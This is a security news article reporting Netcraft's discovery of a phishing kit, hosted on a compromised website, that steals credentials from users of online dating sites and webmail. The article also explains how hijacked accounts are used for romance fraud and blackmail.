- Security TWENTY
- Women in Security
Criminals are running phishing campaigns against online dating sites, a shift in focus from the traditional phishing targets such as banks and other financial institutions. That’s according to Netcraft, a Bath-based internet services company. The most recent attack used a single compromised website to host hundreds of fraudulent PHP scripts, most of which were designed to steal usernames and passwords from users of the most popular dating sites.
The online dating sites targeted by the latest attack include match.com, Christian Mingle, POF (PlentyOfFish), eHarmony, Chemistry.com, SeniorPeopleMeet, Zoosk, Lavalife, amongst others. Only eight of the 862 fraudulent scripts on the server targeted banks.
According to Netcraft it is likely that the criminals who steal accounts on these sites will go on to use them to commit online dating fraud — many dating sites only allow messages to be exchanged with other users after a subscription fee has been paid; by compromising existing paid accounts, the fraudsters can reduce their traceability by avoiding the need to make payments.
Online dating fraud is often by criminal gangs who use fake profiles to trick victims into developing long distance relationships. Once the fraudsters have gathered enough sympathy and trust from a victim, they will exploit this by claiming they need money to pay for travel costs, or to afford medical treatment for family. After the money has been stolen, the criminals will make up further reasons why they need more money. In some cases, the fraudsters blackmail their victim into sending money – if the victim has sent any explicit photos or videos to the criminals, they may threaten to send them to the victim’s friends and family.
The amount of money involved in these scams can be considerable. While many online dating sites take measures to identify fake profiles, phishing for genuine established accounts gives fraudsters the edge. If a legitimate profile has been in active use for several months without cause for concern, then compromising this profile will allow the fraudster to benefit not just from the plausible appearance of the profile, but also take over several ongoing conversations. The real owner of the hijacked account will have already done the hard bit by establishing dialogues with other members on the site, possibly gaining enough trust to allow the fraudsters to strike immediately with success.
The latest attacks make use of a phishing kit which contains hundreds of PHP scripts, configured to send stolen credentials to more than 300 distinct email addresses. More than half of these addresses used the yahoo.com domain, while gmail.com was the next most common choice. Although most of the fraudster’s scripts target online dating sites, some of them are also designed to steal credentials from users of these webmail platforms. Email accounts are often shut down after the provider notices they have been used for fraudulent purposes, so ensuring a fresh supply of compromised accounts gives fraudsters the opportunity to send even more phishing emails before the accounts get closed.